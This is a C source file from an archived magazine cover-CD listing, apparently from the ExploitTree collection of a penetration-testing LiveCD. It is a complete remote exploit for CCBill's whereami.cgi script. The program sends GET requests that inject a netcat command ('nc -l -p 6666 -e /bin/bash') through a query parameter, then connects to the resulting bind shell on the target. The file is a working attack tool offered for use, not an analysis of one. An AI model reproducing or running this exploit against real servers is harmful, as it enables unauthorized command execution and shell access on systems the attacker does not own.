home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
webapp
/
ccbill
/
ccbillx.c
< prev
Wrap
C/C++ Source or Header
|
2005-02-12
|
4KB
|
184 lines
/*
* ==================================================
* CCBILL CGI Remote Exploit for /ccbill/whereami.cgi
* By: Knight420
* 7/07/03
*
* [whois ccbill]
* CCBill provides web Merchants with a comprehensive set of service
* offerings that have been developed by Industry professionals who
* understand the special challenges of conducting business online.
*
* !W00T!W00T!W00T!W00T!W00T!W00T!W00T!W00T!W00T!W00T!W00T!W00T!W00T!
*
* Gr33tz to: sorbo #open #darkircop
*
* (C) COPYRIGHT Blue Ballz , 2003
* all rights reserved
* =================================================
*
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
unsigned char ccbill[] = "GET /ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
"GET /cgi-bin/ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
"GET /cgi-bin/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a";
int
main (int argc, char **argv)
{
int socket;
char *TARGET = "TARGET";
char *server;
unsigned short int port;
struct sockaddr_in sa;
if (argc != 3) {
system("clear");
printf ("[CCBILL CGI Remote Exploit By:Knight420]\n"
"usage: %s <host> <port>\n");
exit (EXIT_FAILURE);
}
setenv (TARGET, argv[1], 1);
server = argv[1];
port = atoi (argv[2]);
socket = net_connect (&sa, server, port, 35);
if (socket <= 0) {
perror ("net_connect");
exit (EXIT_FAILURE);
}
write (socket, ccbill, strlen (ccbill));
sleep (1);
close (socket);
printf ("[CCBILL CGI Remote Exploit By:Knight420]\n");
printf ("[1] evil data sent.\n", server);
printf ("[2] connecting to shell.\n", server);
system("nc ${TARGET} 6666 || echo '[-]Exploit failed!'");
exit (EXIT_SUCCESS);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr (host);
if (i == -1) {
he = gethostbyname (host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
cs->sin_addr.s_addr = net_resolve (server);
if (cs->sin_addr.s_addr == 0) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
